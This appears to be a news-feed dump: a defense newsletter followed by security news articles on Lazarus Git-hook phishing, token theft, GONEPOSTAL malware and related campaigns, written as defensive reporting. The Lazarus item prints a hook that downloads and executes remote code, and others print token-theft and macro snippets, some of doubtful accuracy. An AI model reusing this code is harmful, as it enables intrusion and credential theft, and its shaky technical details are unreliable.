• NATO officials met in an emergency session after Russian drones were shot down over Poland. The intrusion prompted a rare coordinated shootdown effort by the alliance featuring Polish F-16s, Dutch F-35s, an Italian AWACS aircraft, a NATO aerial tanker, and German Patriot air defense systems, NATO Secretary General Mark Rutte told reporters Wednesday. 

    Moscow’s military used “more than 10 Russian Shahed drones” in the incident, which European Union Commission President Ursula von der Layen described as “a reckless and unprecedented violation of Poland and Europe's air[s]pace.” 

    Ukrainian President Volodymir Zelenskyy, “In total, at least several dozen Russian drones were moving along the border of Ukraine and Belarus and across western regions of Ukraine, approaching targets on Ukrainian territory and, apparently, on Polish territory,” Zelenskyy wrote on social media. “Our air defense forces destroyed more than 380 Russian drones of various types. At least 250 of them were [Iranian-designed] ‘shaheds.’”

    “This is the first time NATO aircrafts have engaged potential threats in Allied airspace,” the alliance’s military spokesman said in a statement, and noted alliance members are “committed to defending every kilometre of NATO territory, including our airspace.”

    After the intrusions, Poland invoked NATO’s Article 4, which is an agreement to meet among allies when one feels threatened. “A full assessment of the incident is ongoing,” Rutte said, stressing, “What is clear is that the violation last night is not an isolated incident.”

    Rutte’s message to Russia: “Stop violating Allied airspace. And know that we stand ready, that we are vigilant, and that we will defend every inch of NATO territory.”

    POTUS reax: “What’s with Russia violating Poland’s airspace with drones? Here we go!” the U.S. president wrote on social media Wednesday morning, without elaborating. 

    The view from Berlin: This was not “a matter of course correction errors or anything of that sort. These drones were quite obviously deliberately directed on this course,” said German Defense Minister Boris Pistorius. 

    Canada’s prime minister called the incident “reckless and escalatory,” and vowed to “remain vigilant against Russia’s attempts to widen and prolong the conflict with Ukraine.” 

    Even Putin ally Viktor Orban declared Hungary “stands in full solidarity with Poland following the recent drone incident,” and said on social media, “The violation of Poland’s territorial integrity is unacceptable.”

    The U.S. ambassador to NATO threw his support behind the alliance in a short statement and vowed to “defend every inch of NATO territory.” 

    Capitol Hill reax: “The Administration’s policy towards Russia is weak and vacillating, and Putin is taking advantage of it,” said Armed Services Committee member Rep. Don Bacon, R-Illinois, writing Wednesday morning on social media. 

    “An act of war” is how fellow HASC member Rep. Joe Wilson, R-South Carolina, described the incident, writing on social media as well. He added, “I urge President Trump to respond with mandatory sanctions that will bankrupt the Russian war machine and arm Ukraine with weapons capable of striking Russia. Putin is no longer content just losing in Ukraine while bombing mothers and babies, he is now directly testing our resolve in NATO territory.”

    Two senators on the Foreign Relations Committee released a bipartisan statement criticizing President Trump for insufficient pressure on Moscow, writing, “It has been three weeks since President Trump met with Vladimir Putin. Since that time, Putin met with fellow autocrats in Beijing to conspire against America and returned to Moscow to escalate his illegal invasion of Ukraine,” said co-chairs of the Senate NATO Observer Group Jeanne Shaheen, D-New Hampshire, and Thom Tillis, R-North Carolina. “Russia has now launched the largest aerial assault since the invasion began—firing more than 800 drones and missiles, setting Ukraine’s Cabinet of Ministers ablaze and killing civilians, including a mother and her infant.” 

    “At the very moment Putin escalates, the United States appears to be cutting back,” the senators warn, flagging “Programs like Section 333 security cooperation, which includes the Baltic Security Initiative—lifelines for NATO’s eastern flank—[that] are now on the chopping block, even as Europe takes on more of the burden. The message this sends is dangerous: that the United States is pulling back just as the stakes in Ukraine and for NATO’s security are at their highest. Our adversaries are taking note that they can wait out American support—that does not make America safer.” 

    “Putin has shown us time and again that he is a liar and a murderer. He never wanted peace,” said Shaheen and Tillis, who also encouraged the passage of new “legislation that imposes crippling sanctions on Putin’s regime” because “the cost of inaction to America’s security is too high.” 

    Related: Russian officials “are engaging in a top-down Kremlin-organized effort to threaten Finland,” analysts at the Institute for the Study of War wrote in their Tuesday assessment. Moscow’s threats include the allegation that Finland is becoming a “real hotbed of fascism faster than Ukraine” and that “nothing can be ruled out” in terms of a Russian military intervention into Finland, according to Russian State Duma Defense Committee Chairperson Andrei Kartapolov on Tuesday. And that charge came one day after Dmitry Medvedev of Russia’s Security Council threatened Finland with “language that directly mirrored the Kremlin’s false justifications for its invasions of Ukraine,” ISW writes, warning these threats may be used “to justify future Russian aggression against a NATO member state.” 

    Update: Russia is losing fewer troops as its invasion continues to progress across eastern Ukraine, analysts at the Institute for the Study of War wrote in their Tuesday assessment, citing statistics from Ukrainian officials. From May to August, Russia lost about “68 casualties per square kilometer seized,” compared to “an average of 99 casualties per square kilometer gained in January, February, March, and April 2025,” a half-dozen researchers write in ISW’s latest analysis.  

    Behind the downward trend: Russia has changed how it uses drones in support of combat troops on the ground in an effort “largely led by UAV operators of Russia’s Rubikon Center for Advanced Unmanned Technologies,” ISW writes. That organization was established one year ago, but their operations picked up in early 2025 and have been boosted by the growing use of fiber optic aerial drones, which are impervious to jamming by Ukrainian forces along the frontlines. Background: “Russia began to proliferate Rubikon UAV units across the frontline in April and May 2025, and ISW has observed reports of Rubikon units operating in Kursk Oblast and throughout eastern Ukraine from northeastern Kharkiv Oblast to the Velykomykhailivka direction in western Donetsk Oblast.” More, here

    For your ears only: Listen to CNA’s Sam Bendett discuss the Rubikon Center and much more in the latest episode of Defense One Radio: “How drone warfare is changing.” 

    Additional reading: Tanks Were Just Tanks, Until Drones Made Them Change,” the New York Times reported in a curious interactive on Monday. 


    Welcome to this Wednesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1939, the British accidentally sank one of their own submarines near Norway, marking the Brits’ first sub loss of the war. Only two of the 55-man crew survived.  

    Israel’s attack in Qatar

    Gulf nations ask: if U.S. protection can’t stop an attack on Qatar, what good is it? That’s the gist of a New York Times article on the reverberations from Tuesday’s air strike that sought to kill Hamas officials in Doha.

    Key quote: “Qatar being unable to protect its own citizens with literally the U.S. Central Command on its territory has prompted locals to question the value of the American partnership,” said Kristin Diwan, a senior resident scholar at the Arab Gulf States Institute in Washington, a research group. “It’s a real problem for Gulf leaders. And it should worry the United States as well.”

    WH spox: Trump “feels very badly” about the attack. The president learned about the attack from the U.S. military, and told envoy Steve Witkoff to tip off the Qatari government, Karoline Leavitt told reporters Tuesday.  Eliminating Hamas is a "worthy goal," Leavitt read from a prepared statement. “Unilaterally bombing inside Qatar, a sovereign nation and close ally of the United States that is working very hard and bravely taking risks with us to broker peace, does not advance Israel or America's goals.” More from Axios, here.

    NYT has an explainer on the attack, here.

    Around the Defense Department

    No DOW in NDAA. At least one lawmaker has tried and failed to make the Department of War renaming official, reports Reese Gorman of News of the United States. “An amendment introduced to the NDAA that would rename the Department of Defense to the Department of War—which requires an act of Congress—was not found in order by the Rules Committee.”

    News summaries sent to National Guard leaders reflect public “fear” and troops’ “shame” over D.C. deployment, the Washington Post reports off copies of the summaries slipped to them. “Trending videos show residents reacting with alarm and indignation,” one summary, from Friday, said. “One segment features a local [resident] describing the Guard’s presence as leveraging fear, not security — highlighting widespread discomfort with what many perceive as a show of force.” More, here.

    Trump’s DC “emergency” expires at midnight, but it’s not clear what will change in the nation’s capital. New York Times: “The end of the 30-day period has no bearing on the thousands of National Guard troops, drawn from the District of Columbia itself and from eight Republican-led states, who have been deployed to Washington. Neither does it directly affect the hundreds of additional federal law enforcement officers — from the Federal Bureau of Investigation, the Drug Enforcement Administration and other agencies — who have been sent out into the city to patrol. And U.S. Immigration and Customs Enforcement agents will continue to take people into custody around Washington, as they did long before the emergency was declared.” More, here.

    New: Trump’s Pentagon chief spoke to his Chinese counterpart Tuesday, Pete Hegseth’s spokesman announced Wednesday in what to our knowledge is a first for Hegseth. 

    In his phone call with Defense Minister Adm. Dong Jun, “Hegseth made clear that the United States does not seek conflict with China nor is it pursuing regime change or strangulation of the [People’s Republic of China]. At the same time, however, he forthrightly relayed that the U.S. has vital interests in the Asia-Pacific, the priority theater, and will resolutely protect those interests,” the Defense Department said in a short statement. 

    INDOPACOM: “The homeland is in the Pacific.” In a Monday speech, U.S. Indo-Pacific Command leader Adm. Samuel Paparo said he’s not concerned about reports that defending the homeland is the Pentagon’s new top priority. “The Indo-Pacific is the priority theater of the United States of America.” Defense One’s Jennifer Hlad has a bit more from Honolulu, here.

    China is trying to strongarm Palau with soft power. Beijing is deliberately attempting to “erode leadership, disrupt vital services, and weaken confidence in government” in Palau, and has sent drugs to wash ashore on the Pacific nation to “weaken our community,” the country’s president said Monday. Hlad explains how, here.

    Related: “Leaked files show a Chinese company is exporting the Great Firewall’s censorship technology,” reports Toronto’s Globe and Mail.

    China’s submarine buildup, illustrated by the Wall Street Journal: “China is on the verge of becoming a world-class submarine power, with new technology and a bigger, better fleet that is gaining on the U.S. and its allies—spurring a new undersea arms race in the Pacific.” Find that here.

    To keep up, a U.S. sub yard is turning to AI. “By the end of this year, our plan is to have every single person in our manufacturing shops—17 different businesses, basically across 550 acres—doing work based on the output of what AI tells us to go do. At the end of [2026] all of the people working on all of our ships will be directed by what AI tells us to do,” Brian Fields, the chief technology officer for HII’s Newport News Shipbuilding division, said Tuesday. Defense One’s Lauren C. Williams has a bit more, here.

    Speedboat strike

    The Trump administration has sent a War Powers Resolution report to Congress laying out its justification for the deadly Sept. 2 attack on a speedboat in international waters. Quote: “In the face of the inability or unwillingness of some states in the region to address the continuing threat to United States persons and interests emanating from their territories, we have now reached a critical point where we must meet this threat to our citizens and our most vital national interests with United States military force in self-defense.” Read more, via the War Powers Resolution Reporting Project, here.

    Even with this required notice, the attack was unlawful in several ways, writes Marty Lederman,  a professor at the Georgetown University Law Center, in Just Security. “…it’s likely that the President lacked any affirmative domestic authority to order the strike, and the strike itself appears to have violated several legal prohibitions.”

    And the U.S. military broke a bedrock principle. “As I’ll discuss at the end of this piece, regardless of which laws might have been broken, what’s more alarming, and of greater long-term concern, is that U.S. military personnel crossed a fundamental line the Department of Defense has been resolutely committed to upholding for many decades—namely, that (except in rare and extreme circumstances not present here) the military must not use lethal force against civilians, even if they are alleged, or even known, to be violating the law.” Read that, here.

    Related reading: 

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical security vulnerability has been discovered in the Amp’ed RF BT-AP 111 Bluetooth Access Point, exposing organizations to significant security risks through an unauthenticated administrative interface.

    The device, which serves as a Bluetooth-to-Ethernet bridge supporting both access point and gateway functionality, lacks fundamental authentication controls on its web-based management system.

    The vulnerability, designated as CVE-2025-9994, allows remote attackers with network access to gain complete administrative control over the device without requiring any credentials.

    This flaw affects the device’s HTTP-based administrative interface, which manages critical functions including Bluetooth configurations, network parameters, and security settings.

    The BT-AP 111 supports Universal Plug and Play (UPnP) on the Ethernet side and can handle up to seven simultaneous Bluetooth connections through its UART Serial interface.

    Carnegie Mellon University analysts identified this vulnerability through CERT Coordination Center research, highlighting the device’s failure to implement baseline security controls.

    The researchers noted that this configuration violates established NIST security guidelines, particularly SP 800-121 Rev. 2, which mandates authentication for Bluetooth devices at Service Level 2 or higher.

    Authentication Bypass Mechanism

    The vulnerability stems from a complete absence of authentication mechanisms in the device’s web interface architecture.

    Unlike typical network devices that implement login screens or certificate-based authentication, the BT-AP 111 directly exposes its administrative panel to any user accessing its HTTP port.

    This design flaw allows attackers to modify device configurations, alter Bluetooth pairing settings, and potentially intercept or manipulate data flowing through the bridge.

    The exploitation vector requires only network connectivity to the target device, making it accessible to both local network attackers and, in misconfigured environments, remote threats.

    Given the vendor’s lack of response to disclosure efforts, security professionals recommend isolating affected devices on segregated network segments inaccessible to untrusted users until proper authentication controls can be implemented.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Amp’ed RF BT-AP 111 Bluetooth Access Point Vulnerability Let Attackers Gain Full Admin Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Early this month, cybersecurity researchers uncovered a novel phishing campaign attributed to the Lazarus Group that targets developers and crypto professionals through a cleverly crafted Git symlink vulnerability.

    Rather than relying solely on traditional malware distribution channels, the attackers have weaponized the way Git handles repository paths, embedding malicious hooks within symbolic links to trigger code execution during routine operations.

    This technique allows the attackers to maintain a low profile while compromising high-value targets who assume that their development workflows are immune to social engineering.

    The initial lure begins with personalized messages on professional networking platforms, where prospective victims are invited to participate in a mock technical interview.

    The conversation is structured to gain the victim’s confidence and coax them into running a single Git clone command.

    Besides this, the repository contains a nested directory named api/db_drivers that is actually a symbolic link pointing back into the repository’s .git module directory.

    This deceptive structure ensures that once Git performs a checkout operation, it unwittingly executes the attacker’s custom hook script.

    KuCoin analysts noted the first instances of this attack vector in late August, following reports of compromised private GitLab repositories.

    Detailed analysis revealed that the symlink exploit leverages Git’s post-checkout hook mechanism to initiate a hidden backdoor.

    By embedding a malicious post-checkout script within the symbolic link, the attackers achieve code execution without modifying the main codebase, thus evading standard integrity checks and static scanners.

    Subsequent forensic examination confirmed that the payload establishes an encrypted connection to a remote command-and-control server, siphoning credentials, system information, and wallet data back to the threat actors.

    Attack Flowchart (Non-Technical) (Source – Kucoin)

    The exploit’s sophistication lies in its seamless integration with legitimate workflows. Victims report that after executing:-

    git clone --recursive https://guest:glpat-2xxxxxxyx@gitlab.tresalabs.com/product/delivery.git
    cd product/delivery

    The malicious hook is automatically triggered. The embedded script, hooks/post-checkout, invokes a Node.js backdoor:-

    const vm = require('vm');
    const https = require('https');
    https.get('https://gitlab.tresalabs.com:8443/api/v4/project', res => {
      let data = '';
      res.on('data', chunk => data += chunk);
      res.on('end', () => vm.runInNewContext(Buffer.from(JSON.parse(data).payload, 'base64')));
    });

    Once deployed, this backdoor maintains persistence by cleaning and replacing project files to remove obvious signs of tampering, ensuring that developers see only the expected code.

    Infection Mechanism Deep Dive

    The infection unfolds in two coordinated phases: exploitation of Git’s path resolution and stealthy hook execution.

    First, the attackers create a repository with a directory entry named api/db_drivers^M, exploiting carriage return handling to write the path as api/db_drivers on disk while retaining the symlink target internally.

    Attack Flowchart (Technical) (Source – Kucoin)

    This discrepancy confuses Git into treating the path as a regular directory during traversal but as a link when initializing hooks.

    As Git performs the default checkout, it follows the hidden symlink into the .git/modules/api/db_drivers/hooks/ directory and executes the post-checkout script.

    By exploiting a fundamental behavior of Git, the Lazarus Group has demonstrated a new level of technical ingenuity, blending supply chain compromise with social engineering to target high-value individuals.

    The campaign serves as a stark reminder that even the most trusted development tools can be weaponized when assumptions about workflow integrity go unchallenged.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Lazarus Hackers Exploiting Git Symlink Vulnerability in Sophisticated Phishing Attack appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A recent incident uncovered how a threat actor inadvertently exposed its entire operational workflow by installing a popular endpoint detection and response (EDR) agent on their own attacking infrastructure.

    The scenario unfolded when the adversary, while evaluating various security platforms, triggered alerts that led Huntress analysts to investigate unusual telemetry data.

    Initial observations of system activity and browser history hinted at sophisticated reconnaissance efforts, prompting researchers to delve deeper into the artifacts collected by the EDR system.

    Within hours of deployment, the agent recorded a range of interactions indicative of malicious intent.

    Huntress analysts noted that the unique machine identifier had appeared in prior compromise investigations, immediately flagging the host as adversarial.

    Subsequent correlation of authentication logs and telemetry data revealed patterns of credential theft, session token refreshes, and automated tooling execution.

    Researchers identified attempts to access rotated session tokens and found evidence of automated phishing campaigns orchestrated through bespoke scripts.

    The impact of this accidental installation cannot be overstated. For the first time, defenders gained granular visibility into the day-to-day routines of a live threat operator, from reconnaissance through to active exploitation.

    Google search for Bitdefender, leading to a Huntress ad (Source – Huntress)

    The threat actor’s day typically began with passive external scanning, later transitioning to targeted exploitation of identified organizations.

    Detailed browser history entries showed extensive use of both public and subscription-based services for reconnaissance, as well as the deployment of residential proxy services to anonymize traffic and evade detection.

    Over the course of a three-month period, the EDR telemetry captured a clear evolution in the attacker’s workflow.

    Early activities focused on researching banking institutions and third-party vendors, whereas later stages revealed the adoption of automated workflows for phishing message generation.

    Timeline (Source – Huntress)

    Huntress researchers identified a gradual shift toward more programmatic tool usage, with the adversary scripting repetitive tasks to increase operational efficiency.

    Infection Mechanism and Persistence Tactics

    A deeper look into the infection mechanism uncovers how the threat actor achieved initial access and maintained a foothold within target environments.

    Automated workflows (Source – Huntress)

    The adversary leveraged stolen session cookies extracted from Telegram Desktop cookie files using a simple Python script. The script, executed via:-

    from roadtx import PrtAuth
    
    auth = PrtAuth(token_file="victim_cookie.json")
    session = auth.acquire()
    print(session)

    This reveals how the attacker automated primary refresh token extraction for Microsoft Entra and Office 365 services.

    Once valid tokens were obtained, they were used to authenticate into victim accounts without triggering multifactor authentication or alerting endpoint defenses.

    Persistence was achieved by deploying scheduled tasks that regularly renewed session tokens and executed reconnaissance scripts. These tasks were registered in the Windows Task Scheduler under inconspicuous names to blend with legitimate processes.

    Various tools that the attacker may have used (Source – Huntress)

    Huntress analysts identified these entries and observed periodic outbound connections to attacker-controlled C2 servers, confirming ongoing control.

    This rare visibility into real-world threat actor behavior provided invaluable insights for defenders. By dissecting the infection and persistence techniques, security teams can craft targeted detection rules and harden authentication workflows against similar token-based attacks.

    The collaboration between telemetry-driven analysis and manual artifact review underscores the importance of comprehensive EDR solutions in modern security operations.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Threat Actor Installed EDR on Their Systems, Revealing Workflows and Tools Used appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Sofia, Bulgaria, September 10th, 2025, CyberNewsWire

    Kikimora, a cybersecurity specialist and a product developer, has announced the launch of Kikimora Agent, a new AI-powered platform providing accessible cybersecurity management, vulnerability detection, and asset monitoring for businesses, individuals, and students.

    Kikimora Agent combines conversational AI with automated security workflows, reducing the workload for small and medium-sized enterprises (SMEs) facing increased cyber attacks and growing security skills shortages.

    “Kikimora Agent reduces manual tool juggling and high skill requirements. The platform allows users to easily manage assets, run vulnerability scans, and generate compliance reports with simple prompts.

    It delivers immediate value to security teams with minimal setup and almost no learning curve.”, highlights Krasimir Kotsev, CEO of Kikimora.

    Kikimora Agent is designed to simplify traditionally complex cybersecurity processes and provides a split-screen interface for conversational interactions and live inventory management.

    Users can interact via natural language prompts to access security tools, manage infrastructure, monitor vulnerabilities, and receive actionable recommendations for remediation and compliance.

    Key segments supported include Attack Surface Management, Vulnerability Management, Asset Management, Endpoint Security, and Security Project Management.

    “Automation in cybersecurity is no longer a luxury – it’s a necessity for organizations with limited resources,” said Martin Malinov, Head of Product of Kikimora Agent.

    Kikimora Agent combines a range of security integrations – such as Qualys web application scanning and Wazuh endpoint monitoring – ensuring users maintain control over data privacy and compliance requirements.

    Kikimora Agent supports full workflow management, including listing and updating assets, executing and tracking vulnerability scans, assigning remediation tasks, querying OWASP checklists, and onboarding new endpoints.

    The agent’s experiment-and-estimate vertical allows rapid learning, scenario analysis, and tool migration without lengthy setup cycles.

    The agent can perform tasks based on local context, and provide actionable recommendations to improve your remediation efforts.

    Simply typing ‘Scan my web application…’, ‘List my current assets…’, or ‘Create a plan for NIS2 compliance…’ will prompt the agent to provide detailed information and a step-by-step guide to accomplish current objectives.

    The launch comes at a time when European SMEs are facing more cyber threats, with rising attack rates and stricter regulations like GDPR and NIS2.

    The goal of the Kikimora Agent is to reduce operational complexity and provide consolidated access to AI-enhanced security tools to a wider range of organizations and budgets.

    Users can start using Kikimora Agent at: https://agentic.kikimora.io/

    Users can find Get Started Guides, Documentation & Example Prompts: https://kikimora.gitbook.io/kikimora-agent-guide-early-access/

    About Kikimora

    Built by the experienced team of SoCyber, Kikimora provides cybersecurity solutions for organizations across Europe, specializing in cybersecurity product development and accessible automation.

    The company is committed to improving accessibility and security through practical, AI-powered tools that simplify operations for small and midsize teams.

    Contact

    CEO

    Krasimir Kotsev

    Kikimora

    marketing@so-cyber.com

    The post Kikimora Announces Launch of Kikimora Agent: Accessible AI-Powered Cybersecurity Platform for SME Security appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated phishing campaign has emerged targeting Google Workspace organizations through fraudulent emails impersonating Google’s AppSheet platform.

    The attack demonstrates how cybercriminals exploit legitimate cloud services to bypass traditional email security measures and steal user credentials.

    Discovered in September 2025, this campaign represents a significant escalation in social engineering tactics, leveraging the inherent trust organizations place in Google’s no-code application development platform.

    The malicious campaign capitalizes on AppSheet’s widespread enterprise adoption and deep integration with Google Workspace infrastructure.

    By masquerading as legitimate AppSheet communications, attackers successfully circumvent email authentication protocols while delivering convincing trademark violation notices to unsuspecting recipients.

    The attack’s effectiveness stems from its abuse of authentic Google infrastructure, making detection extraordinarily challenging for conventional security systems.

    This phishing operation follows a pattern of legitimate service abuse that security researchers have tracked since March 2025, when similar campaigns exploited AppSheet to impersonate Meta and PayPal services.

    Raven analysts identified the current trademark violation campaign as an evolution of these earlier tactics, noting how attackers have refined their approach to maximize credential harvesting success rates while maintaining operational security.

    The campaign’s most concerning aspect lies in its technical sophistication and authentication bypass capabilities.

    Unlike traditional phishing attacks that rely on compromised or spoofed domains, this operation leverages Google’s legitimate email infrastructure to deliver malicious content.

    Messages originate from noreply@appsheet.com, ensuring perfect SPF, DKIM, and DMARC authentication while maintaining excellent sender reputation scores.

    Technical Infrastructure and Delivery Mechanism

    The attack methodology exploits AppSheet’s legitimate email functionality through multiple potential vectors.

    Attackers either compromise existing user accounts on the platform or abuse the service’s notification systems to craft messages that appear authentically generated by Google’s infrastructure.

    Phishing email (Source – Raven)

    The phishing emails contain professionally formatted content mimicking trademark enforcement notices, complete with urgent legal compliance requirements designed to prompt immediate user action.

    Critical to the campaign’s success is its use of suspicious URL shorteners, particularly goo.su domains, which redirect victims to credential harvesting sites.

    These shortened links are embedded within otherwise legitimate-appearing legal notifications, creating a compelling pretext for user interaction.

    The attackers strategically host their phishing infrastructure on reputable platforms like Vercel, further enhancing the operation’s credibility and evasion capabilities.

    Detection proves challenging because the emails pass all traditional authentication checks while appearing contextually appropriate to recipients familiar with routine AppSheet communications.

    AppSheet phish breakdown (Source – Raven)

    This combination of technical legitimacy and social engineering sophistication highlights the urgent need for context-aware email security solutions that analyze sender-content relationships rather than relying solely on authentication protocols.

    The campaign underscores how legitimate cloud services can become weaponized attack vectors, forcing organizations to reconsider fundamental assumptions about trusted communications in enterprise environments.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New Phishing Attack Mimics Google AppSheet to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent weeks, security teams have observed a sophisticated new strain of malware—dubbed GONEPOSTAL—that subverts Microsoft Outlook to relay command and control (C2) instructions.

    Emerging through spear-phishing campaigns targeting corporate environments, GONEPOSTAL disguises itself as a benign Office document.

    Upon opening the weaponized attachment, victims unknowingly activate a multi-stage payload that interfaces directly with Outlook’s COM APIs to send and receive encrypted email messages containing C2 data.

    Early indicators suggest the threat actor behind GONEPOSTAL aims to maintain stealth by hiding network traffic within legitimate email flows, undermining traditional perimeter-based defenses.

    Kroll analysts noted that the initial compromise vectors rely on social engineering tactics that exploit common workplace behaviors.

    The malicious document leverages a heavily obfuscated VBA macro to drop a lightweight launcher executable into the user’s temporary folder.

    Once invoked, the launcher dynamically loads additional modules from a remote server, blending in with routine Outlook operations.

    These secondary modules parse the victim’s address book to identify likely internal targets for lateral movement, then craft outbound emails with base64-encoded control instructions embedded in image attachments.

    Kroll researchers identified that this tactic effectively bypasses most email gateway appliances, as the attachments appear as innocuous company logos or promotional flyers.

    In its third phase, GONEPOSTAL establishes persistence by creating a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, referencing a benign-looking Word document named “Company_Update.docx.”

    This document contains a hidden OLE object that, when opened by the victim via Outlook preview, re-executes the payload without raising any security prompts.

    Further, the malware writes a DLL into the AppData\Roaming\Microsoft\Outlook directory and registers it with Outlook’s add-ins framework, ensuring that every instance of Outlook automatically loads the malicious component on startup.

    Victims typically remain unaware of the residence of the threat, as the add-in manifests under the name “OfficeUpdate.”

    The impact of GONEPOSTAL has been significant. Multiple mid-sized enterprises in North America have reported unexplained outbound email traffic spikes, matched by credential theft and unauthorized file transfers.

    Security teams investigating anomalous SMTP sessions uncovered encrypted JSON blobs masquerading as inline images, which—after decryption—revealed system reconnaissance data and remote shell commands.

    This dynamic C2 channel enables the adversaries to query registry keys, manipulate files, and pivot to domain controllers, all while evading standard detection signatures.

    Infection Mechanism

    A closer examination of GONEPOSTAL’s infection mechanism reveals the campaign’s reliance on a cleverly crafted VBA macro embedded within a booby-trapped document.

    Flowchart of execution (Source – Kroll)

    The macro code, heavily obfuscated to conceal its true purpose, begins by declaring Outlook COM object references:-

    Dim OutlookApp As Object
    Set OutlookApp = CreateObject("Outlook.Application")
    Dim MailItem As Object
    Set MailItem = OutlookApp.CreateItem(0)
    MailItem.To = recipientAddress
    MailItem.Subject = "Monthly Report"
    MailItem.Attachments.Add payloadPath
    MailItem.Send

    Once executed, this snippet not only dispatches the initial payload but also schedules follow-up tasks via the Windows Task Scheduler, ensuring that Outlook remains the primary conduit for ongoing command orchestration.

    By leveraging native Windows and Office components, GONEPOSTAL sidesteps external dependencies, making it especially challenging to pinpoint through conventional network monitoring tools.

    The infection chain culminates with the installation of a stealthy Outlook add-in, allowing the attacker to harvest sent and received emails, covertly modify message content, and issue new C2 commands without user awareness.

    This modular design demonstrates a high degree of operational maturity, indicating that the threat actor is well-versed in blending malicious activity into everyday user workflows.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New GONEPOSTAL Malware Hijacking Outlook to Enable Command and Control Communication appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Apple has announced that the upcoming iPhone 17 and iPhone Air will feature a groundbreaking security capability called Memory Integrity Enforcement (MIE), designed to thwart sophisticated mercenary spyware attacks.

    This new feature, the result of a five-year engineering initiative, integrates Apple silicon hardware with advanced operating system security to provide what the company calls “industry-first, always-on memory safety protection” without impacting device performance.

    While the average iPhone user has not been subject to successful, widespread malware attacks, a more insidious threat exists in the form of mercenary spyware.

    These highly complex attacks are often associated with state actors and involve exploit chains that can cost millions of dollars to develop. They are used to target a very small number of specific individuals, such as journalists, activists, and government officials.

    A common link in these attacks, whether on iOS, Android, or Windows, is the exploitation of memory safety vulnerabilities. Apple’s MIE is a direct response to this threat, aiming to make such exploits significantly more difficult and expensive to carry out.

    This effort is part of a broader strategy at Apple to enhance memory safety, which also includes the development of memory-safe programming languages like Swift and the introduction of secure memory allocators in previous iOS versions.

    How MIE Provides Protection

    Memory Integrity Enforcement is built upon several layers of technology. It starts with Apple’s secure memory allocators, which organize memory based on its intended purpose, making it harder for attackers to corrupt.

    The core of MIE, however, is the use of the Enhanced Memory Tagging Extension (EMTE), a feature developed in collaboration with Arm, which is supported by the new A19 and A19 Pro chips.

    EMTE works by assigning a “tag” to each piece of memory. When a program tries to access that memory, the hardware checks if it has the correct tag.

    If the tags do not match, which can happen during a buffer overflow or use-after-free attack, the hardware immediately blocks the access and terminates the process.

    Memory Integrity Enforcement

    Apple’s implementation is strictly synchronous, meaning it checks for memory corruption in real-time, leaving no window for attackers to exploit.

    To protect against even the most advanced threats, MIE also includes Tag Confidentiality Enforcement to guard against side-channel and speculative-execution attacks that could reveal memory tags.

    Apple’s offensive research team spent five years, from 2020 to 2025, continuously attacking MIE prototypes to identify and eliminate potential weaknesses before the feature’s public release.

    The company’s evaluation, which tested MIE against real-world exploit chains used in previous attacks, concluded that the new protection fundamentally disrupts attackers’ strategies.

    The research showed that MIE blocks attacks so early in the process that it was not possible to rebuild the exploit chains by simply swapping in different vulnerabilities.

    With the launch of MIE, Apple aims to make this powerful protection available to third-party app developers through Xcode’s “Enhanced Security” settings.

    By making it immensely more expensive and difficult to develop and maintain memory corruption-based spyware, Apple believes Memory Integrity Enforcement represents one of the most significant upgrades to memory safety in the history of consumer operating systems.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Apple iPhone 17 With New Memory Integrity Enforcement Feature to Block Mercenary Spyware Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security researchers have observed a sophisticated campaign in recent weeks targeting critical infrastructure and government entities across South Asia.

    Dubbed the DarkSamural operation, this attack chain leverages deceptively crafted LNK and PDF files to infiltrate networks, establish persistence, and exfiltrate sensitive information.

    Initial reconnaissance indicates that the adversaries disguise malicious MSC (Microsoft Management Console) files with familiar PDF icons, enticing recipients to inadvertently launch embedded scripts.

    As the campaign unfolds, stolen credentials and system metadata flow back to the attackers’ command-and-control servers, enabling further lateral movement.

    The infection begins with a spear-phishing email containing a compressed archive. Recipients are presented with a file named Drone_Information.pdf[.]msc, which, despite its PDF-like appearance, executes when double-clicked.

    Ctfiot analysts noted that these MSC files employ GrimResource technology to unpack and run obfuscated JavaScript, which in turn downloads a second-stage payload.

    This multi-layered approach impedes signature-based detection, as each stage appears benign until deobfuscation occurs.

    Researchers identified that the malicious script contacts a remote URL and retrieves a disguised DLL, eventually stored under C:\ProgramData\DismCore[.]dll for subsequent execution.

    By the third paragraph, it becomes evident that DarkSamural’s impact extends beyond initial access.

    Victims have reported unauthorized file transfers, browser credential theft, and even remote shell access.

